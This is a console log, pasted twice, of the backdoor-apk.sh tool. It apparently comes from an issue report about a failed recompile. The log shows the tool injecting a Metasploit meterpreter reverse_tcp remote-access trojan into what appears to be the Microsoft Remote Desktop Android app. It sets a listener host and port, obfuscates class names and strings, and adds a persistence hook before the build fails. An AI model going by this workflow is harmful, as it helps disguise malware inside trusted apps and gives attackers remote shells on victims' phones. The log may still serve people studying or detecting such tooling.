`[*] Running backdoor-apk.sh v0.2.4a on 2023年 05月 16日 星期二 21:57:51 CST
[+] Android payload options:
- meterpreter/reverse_http
- meterpreter/reverse_https
- meterpreter/reverse_tcp
- shell/reverse_http
- shell/reverse_https
- shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.143
[?] Please enter an LPORT value: 4444
[+] Android manifest permission options:
- Keep original
- Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[] Decompiling original APK file...done.
[] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/microsoft/rdc/androidx
[+] Smali file to hook RAT payload: com/microsoft/rdc/android/RDP_AndroidApp.smali
[] Generating RAT APK file...done.
[] Decompiling RAT APK file...done.
[] Merging permissions of original and payload projects...done.
[] Injecting helpful Java classes in RAT APK file...done.
[] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/microsoft/rdc/androidx/kmawo
[+] Generated new smali class name for MainBroadcastReceiver.smali: Bcwhv
[+] Generated new smali class name for MainService.smali: Ptidi
[+] Generated new smali class name for Payload.smali: Yrxsj
[+] Generated new smali class name for StringObfuscator.smali: Geckb
[+] Generated new smali method name for StringObfuscator.obfuscate method: xtset
[+] Generated new smali method name for StringObfuscator.unobfuscate method: qrnbf
[] Copying RAT smali files to new directories in original project...done.
[] Fixing RAT smali files...done.
[] Obfuscating const-string values in RAT smali files...done.
[] Adding hook in original smali file...done.
[] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor
`
`[*] Running backdoor-apk.sh v0.2.4a on 2023年 05月 16日 星期二 21:57:51 CST
[+] Android payload options:
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.143
[?] Please enter an LPORT value: 4444
[+] Android manifest permission options:
[?] Please select an Android manifest permission option: 2
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[] Decompiling original APK file...done.
[] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/microsoft/rdc/androidx
[+] Smali file to hook RAT payload: com/microsoft/rdc/android/RDP_AndroidApp.smali
[] Generating RAT APK file...done.
[] Decompiling RAT APK file...done.
[] Merging permissions of original and payload projects...done.
[] Injecting helpful Java classes in RAT APK file...done.
[] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/microsoft/rdc/androidx/kmawo
[+] Generated new smali class name for MainBroadcastReceiver.smali: Bcwhv
[+] Generated new smali class name for MainService.smali: Ptidi
[+] Generated new smali class name for Payload.smali: Yrxsj
[+] Generated new smali class name for StringObfuscator.smali: Geckb
[+] Generated new smali method name for StringObfuscator.obfuscate method: xtset
[+] Generated new smali method name for StringObfuscator.unobfuscate method: qrnbf
[] Copying RAT smali files to new directories in original project...done.
[] Fixing RAT smali files...done.
[] Obfuscating const-string values in RAT smali files...done.
[] Adding hook in original smali file...done.
[] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor
`